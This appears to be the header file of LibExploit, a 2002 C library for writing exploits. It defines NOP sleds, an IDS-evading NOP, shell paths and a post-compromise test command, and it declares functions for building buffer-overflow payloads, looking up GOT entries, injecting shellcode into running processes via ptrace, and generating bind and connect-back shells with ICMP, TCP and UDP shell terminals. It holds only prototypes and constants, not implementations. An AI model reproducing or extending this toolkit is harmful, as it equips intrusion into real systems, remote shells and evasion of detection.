/* LibExploit
 *
 * FILENAME : LibExploit.h
 * DATE     : 11/08/2002
 * CODER    : Simon Roses Femerling
 * ABSTRACT : Main library file of LibExploit.
 *
 * Copyright (C) 2002-2003. Simon Roses Femerling <sroses@ibsec.net>
*/

#ifndef __LIBEXPLOIT_H
#define __LIBEXPLOIT_H

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <unistd.h>
#include <signal.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <sys/utsname.h>
#include <sys/ptrace.h>
#include <asm/user.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <fcntl.h>

#include "shellcodes.h"

// LibShellcode library.
#include "libShellCode.h"
#include "codes.h"

// ADMmutate library.
#include "ADMmutapi.h" 

/*************************************************************
* Defines
*************************************************************/

#define LIBEXPLOITVER "0.2"

#define LIBEXPLOIT_ERROR_SIZE 256

#define LIBEXPLOIT_INTERNAL_SIZE 256

// x86
#define NOP 0x90
#define IDS_NOP 0xeb02

// x86
#define NOP_SIZE 1
#define IDS_NOP_SIZE 2

#define BIN     "/bin"
#define SH      "/sh"
#define BASH    "/bash"
#define BINSH   "/bin/sh"
#define BINBASH "/bin/bash"

#define ZERO 0
#define MAX1024 1024

#define FTP             21
#define SSH             22
#define TELNET          23
#define SMTP            25
#define DNS    	        53	
#define ORACLE_SQL_NET  66
#define HTTP            80
#define POP             110
#define RPC	        111	
#define IDENT           113
#define NETBIOS_SESSION 139
#define IMAP            143
#define SSL	        443
#define SMB	        445	
#define MSSQL           1433
#define MSSQL_TCPIP     1434
#define ORACLE		1521
#define MSSQL7	        1944 	
#define MYSQL           3306
#define POSTGRESQL      5432

#define YES 1
#define NO  0

#define TESTEXPLOIT "cd /; uname -a; pwd; id;\n"

#define TIME 2 

#define OBJDUMP "/usr/bin/objdump"
#define GREP    "/bin/grep"

#define VALIDATESHELL "\\\/:*?\"<>|"

#define	LIBEXPLOIT_MAX(a, b)	((a) > (b) ? (a) : (b))

/*************************************************************
* LibExploit Terminal Stuff
*************************************************************/

#define NO_SHELL   0	
#define ICMP_SHELL 1
#define TCP_SHELL  2
#define UDP_SHELL  3


enum opcodes {
	QUIT     = 1,
	HELP     = 2,
	SET      = 3,
	STATUS   = 4,
	CON      = 5,
	DIS      = 6,
	CMD	 = 7, 	
	VERSION  = 8,
	CLEAR    = 9,
	DEFAULT  = 10
};

/*************************************************************
* Global Variables
*************************************************************/

// x86
static char nop[1] = "\x90";

struct utsname name;

char error_msg[LIBEXPLOIT_ERROR_SIZE];

/*************************************************************
* Prototypes
*************************************************************/

//
// Buffer Overflow Functions
// Func : 14
void LibExploit_InfoShell(int numshell);
void LibExploit_Runshell(int numshell);
char *LibExploit_GiveHexShell(int numshell);
int LibExploit_GiveSizeShell(int numshell);
char *LibExploit_GiveNameShell(int numshell);
char *LibExploit_GiveTypeShell(int numshell);
char *LibExploit_GiveOsShell(int numshell);
char *LibExploit_GivePlatformShell(int numshell);
unsigned long LibExploit_Calculateret(char *shell, char *path);
void LibExploit_DisplayShell(char *shell, int len);
int LibExploit_CheckShell(unsigned char *sh);
char *LibExploit_FillRet(int eggsize, char *egg, unsigned long ret);
char *LibExploit_FillNOP(int eggsize, char *egg);
void LibExploit_ExecuteShell(char *shl);

//
// x86, Sparc, Alpha && HHPA arch functions (x86.c && sparc.c && alpha.c 
// && hhpa.c)
// 
unsigned long LibExploit_Getesp();

//
// Network Functions
// Func : 11
int LibExploit_Connect(char *host, int port);
int LibExploit_Write(int Sock, char *msg);
unsigned long LibExploit_Resolve(char *host);
void LibExploit_Loginftp(int Sock,char *user, char *pass); 
int LibExploit_Send(int Sock, const char *msg);
int LibExploit_Close(int Sock);
int LibExploit_Read(int Sock, char dt[MAX1024]);
int LibExploit_CheckBanner(int Sock, char str[MAX1024]);
int LibExploit_InternalConnectICMPClient(char *host);
int LibExploit_InternalCMDICMPClient(int sock, char *cmd);
char *LibExploit_SendHTTPHead(int sock);

//
// Misc Functions
// Func : 14
void LibExploit_DoShell(int Sock, char *test);
char *LibExploit_GetLocalOS();
char *LibExploit_GetLocalPlatform();
char *LibExploit_MakeTrash(char car, int size);
void LibExploit_MakeTolower(char *data, int size);
void LibExploit_MakeToupper(char *data, int size);
char *LibExploit_Error();
int LibExploit_InternalPrint(char *msg);
int LibExploit_OpenTerminal();
int LibExploit_DoRequest(char cmd[]);
void LibExploit_InternalClearTerminal();
int LibExploit_InternalPrintStatus();
void LibExploit_InternalCheckStatus();
int LibExploit_ConnectShell(int sock);

//
// Expshell Functions
// Func : 12
char *LibExploit_LibshellcodeVer();
char *LibExploit_GenerateWriteShell(int out, char *msg, int setuid, int xor);
char *LibExploit_GenerateFileShell(char *file, char *msg, int setuid, int xor);
char *LibExploit_GenerateExecShell(char *prog, int setuid, int xit, int xor);
char *LibExploit_GenerateBindShell(char *prog, int setuid, int xit, int port, int fork, int xor);
char *LibExploit_GenerateConnectShell(char *prog, int setuid, int xit, char *ip, int port, int xor);
char *LibExploit_ShellCreator();
int LibExploit_InjectShell(int pid, char *shl);
int LibExploit_GetGOT(const char *exe, const char *func);
void LibExploit_SetObjdump(char *path);
void LibExploit_SetGrep(char *path);
char *LibExploit_AddSetuid(char *shl);
char *LibExploit_AddNOP(char *shl, int num);
int LibExploit_ValidateShell(char *sh, unsigned char *str);

#endif

/* E0F */
